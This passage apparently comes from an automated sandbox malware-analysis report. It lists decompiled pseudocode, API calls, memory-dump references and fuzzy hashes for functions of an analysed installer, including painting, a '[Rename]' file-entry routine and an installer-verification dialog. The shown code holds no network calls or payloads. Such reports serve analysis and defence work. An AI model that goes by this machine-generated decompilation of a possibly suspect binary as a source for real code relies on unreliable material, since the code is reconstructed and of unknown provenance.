			}













                                                            0x0040100a
                                                            0x00401039
                                                            0x00401047
                                                            0x0040104d
                                                            0x00401051
                                                            0x0040105b
                                                            0x00401061
                                                            0x00401064
                                                            0x004010f3
                                                            0x00401089
                                                            0x0040108c
                                                            0x004010a6
                                                            0x004010bd
                                                            0x004010cc
                                                            0x004010cf
                                                            0x004010d5
                                                            0x004010d9
                                                            0x004010e4
                                                            0x004010ed
                                                            0x004010ef
                                                            0x004010ef
                                                            0x00401100
                                                            0x00401105
                                                            0x0040110d
                                                            0x00401110
                                                            0x00401112
                                                            0x00401118
                                                            0x0040111f
                                                            0x00401126
                                                            0x00401130
                                                            0x00401142
                                                            0x00401156
                                                            0x00401160
                                                            0x00401165
                                                            0x00401165
                                                            0x00401110
                                                            0x0040116e
                                                            0x00000000
                                                            0x00401178
                                                            0x00401010
                                                            0x00401013
                                                            0x00401015
                                                            0x0040101f
                                                            0x0040101f
                                                            0x00000000

                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,0044E420,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction ID: 0bd4ef5fed811bbf4bded0a7f85d82f2f783d311ad13c466ed52a022670cf4ac
                                                            • Opcode Fuzzy Hash: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction Fuzzy Hash: E7417C71800209AFCF058FA5DE459AFBFB9FF45315F00802AF991AA1A0C774EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405EC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405EC0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x448620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x448a20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x448220, "%s=%s\r\n", 0x448620, 0x448a20);
						_t53 = _t52 + 0x10;
						E004062EA(_t37, 0x400, 0x448a20, 0x448a20,  *((intOrPtr*)( *0x452430 + 0x128)));
						_t12 = E00405DEA(0x448a20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA5(_t24 + _t46, 0x448220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E91(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DEA(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x448620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                            0x00405ec0
                                                            0x00405ec9
                                                            0x00405ed0
                                                            0x00405ee4
                                                            0x00405f0c
                                                            0x00405f17
                                                            0x00405f1b
                                                            0x00405f3b
                                                            0x00405f42
                                                            0x00405f4c
                                                            0x00405f59
                                                            0x00405f5e
                                                            0x00405f63
                                                            0x00405f67
                                                            0x00405f76
                                                            0x00405f78
                                                            0x00405f85
                                                            0x00405f89
                                                            0x00406024
                                                            0x00000000
                                                            0x00405f9f
                                                            0x00405fac
                                                            0x00405fd0
                                                            0x00405fd4
                                                            0x00405ff3
                                                            0x00405ff7
                                                            0x00405ff7
                                                            0x00405ff9
                                                            0x00406002
                                                            0x0040600d
                                                            0x00406018
                                                            0x0040601e
                                                            0x00000000
                                                            0x0040601e
                                                            0x00405fd6
                                                            0x00405fd9
                                                            0x00405fe4
                                                            0x00405fe0
                                                            0x00405fe2
                                                            0x00405fe3
                                                            0x00405fe3
                                                            0x00405feb
                                                            0x00405fed
                                                            0x00000000
                                                            0x00405fed
                                                            0x00405fb7
                                                            0x00405fbd
                                                            0x00000000
                                                            0x00405fbd
                                                            0x00405f89
                                                            0x00405f67
                                                            0x00405ee6
                                                            0x00405ef1
                                                            0x00405efa
                                                            0x00405efe
                                                            0x00000000
                                                            0x00000000
                                                            0x00405efe
                                                            0x0040602f

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405EF1
                                                            • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                            • wsprintfA.USER32 ref: 00405F35
                                                            • GetFileSize.KERNEL32(00000000,00000000,00448A20,C0000000,00000004,00448A20,?,?,?,?,?), ref: 00405F70
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                            • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,00448220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00406025
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %s=%s$[Rename]
                                                            • API String ID: 2171350718-1727408572
                                                            • Opcode ID: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction ID: a927ddba45d5df7a47f9583d2fa9cd5bb3fc37aebfc63fa68c1436a548016810
                                                            • Opcode Fuzzy Hash: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction Fuzzy Hash: 7C310531200B166BC2207B659D48F6B7A9CEF49758F15043FFA42F62D2DB7CD8118AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040433B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                            0x0040434d
                                                            0x00404403
                                                            0x00000000
                                                            0x00404403
                                                            0x0040435e
                                                            0x00404362
                                                            0x00000000
                                                            0x0040437c
                                                            0x0040437c
                                                            0x00404385
                                                            0x00000000
                                                            0x00000000
                                                            0x00404387
                                                            0x00404393
                                                            0x00404396
                                                            0x00404396
                                                            0x0040439c
                                                            0x004043a2
                                                            0x004043a2
                                                            0x004043ae
                                                            0x004043b4
                                                            0x004043bb
                                                            0x004043be
                                                            0x004043c1
                                                            0x004043c3
                                                            0x004043c3
                                                            0x004043cb
                                                            0x004043d1
                                                            0x004043d1
                                                            0x004043db
                                                            0x004043e0
                                                            0x004043e3
                                                            0x004043e8
                                                            0x004043eb
                                                            0x004043eb
                                                            0x004043fb
                                                            0x004043fb
                                                            0x00000000
                                                            0x004043fe

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                            • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C22128 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E73C22128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E73C212C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M73C22268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x73c24060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x73c24080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E73C2144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x73c25040);
								goto L17;
							case 4:
								__ecx =  *0x73c25040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x73c25040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73c25040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73c24058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E73C215C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E73C2157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}










                                                            0x73c22136
                                                            0x73c22138
                                                            0x73c2213b
                                                            0x73c22147
                                                            0x73c22149
                                                            0x73c2214e
                                                            0x73c2214e
                                                            0x73c22156
                                                            0x73c2215d
                                                            0x73c22163
                                                            0x00000000
                                                            0x73c2216a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22172
                                                            0x73c22176
                                                            0x73c22178
                                                            0x73c22179
                                                            0x73c22184
                                                            0x73c22188
                                                            0x73c22188
                                                            0x73c2218f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22192
                                                            0x73c22193
                                                            0x73c22196
                                                            0x73c22198
                                                            0x00000000
                                                            0x00000000
                                                            0x73c221a8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c221d8
                                                            0x73c221ee
                                                            0x73c221f4
                                                            0x73c221f9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c221b0
                                                            0x73c221b2
                                                            0x73c221b5
                                                            0x73c221b6
                                                            0x73c221b8
                                                            0x73c221be
                                                            0x73c221ca
                                                            0x73c221d0
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22200
                                                            0x73c22202
                                                            0x73c22208
                                                            0x73c2220e
                                                            0x73c2220e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22163
                                                            0x73c22211
                                                            0x73c22215
                                                            0x73c22228
                                                            0x73c22228
                                                            0x73c2222e
                                                            0x73c22233
                                                            0x73c22238
                                                            0x73c22244
                                                            0x73c22249
                                                            0x00000000
                                                            0x73c2224e
                                                            0x73c2223a
                                                            0x73c2223b
                                                            0x73c2224f
                                                            0x73c2224f
                                                            0x73c22238
                                                            0x73c22250
                                                            0x73c22253
                                                            0x73c22253
                                                            0x73c22267

                                                            APIs
                                                              • Part of subcall function 73C212C6: GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C2225D
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 3e5b46107e6976e0ed326ad21c51fc1522a9cbbfee95e31528e3cf28d7ba1ffb
                                                            • Instruction ID: 63c18371d5a97deb19b4540191ac693de60c0540b6804247fe0fd059a9918587
                                                            • Opcode Fuzzy Hash: 3e5b46107e6976e0ed326ad21c51fc1522a9cbbfee95e31528e3cf28d7ba1ffb
                                                            • Instruction Fuzzy Hash: 1D412232114248EFE716DF56CC45F2ABFB9FB55312F110129F90ADA191DB72AC80CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404C27 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                            0x00404c35
                                                            0x00404c42
                                                            0x00404c48
                                                            0x00404c86
                                                            0x00404c86
                                                            0x00404c95
                                                            0x00404c9c
                                                            0x00000000
                                                            0x00404c9e
                                                            0x00404c4a
                                                            0x00404c59
                                                            0x00404c61
                                                            0x00404c64
                                                            0x00404c76
                                                            0x00404c7c
                                                            0x00404c83
                                                            0x00000000
                                                            0x00404c83
                                                            0x00000000

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x426040; // 0xa399b
					_t11 =  *0x43204c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                            0x00402e32
                                                            0x00402e40
                                                            0x00402e46
                                                            0x00402e46
                                                            0x00402e54
                                                            0x00402e56
                                                            0x00402e5c
                                                            0x00402e63
                                                            0x00402e65
                                                            0x00402e65
                                                            0x00402e7b
                                                            0x00402e8b
                                                            0x00402e9d
                                                            0x00402e9d
                                                            0x00402ea5

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                            • MulDiv.KERNEL32 ref: 00402E6B
                                                            • wsprintfA.USER32 ref: 00402E7B
                                                            • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E75
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
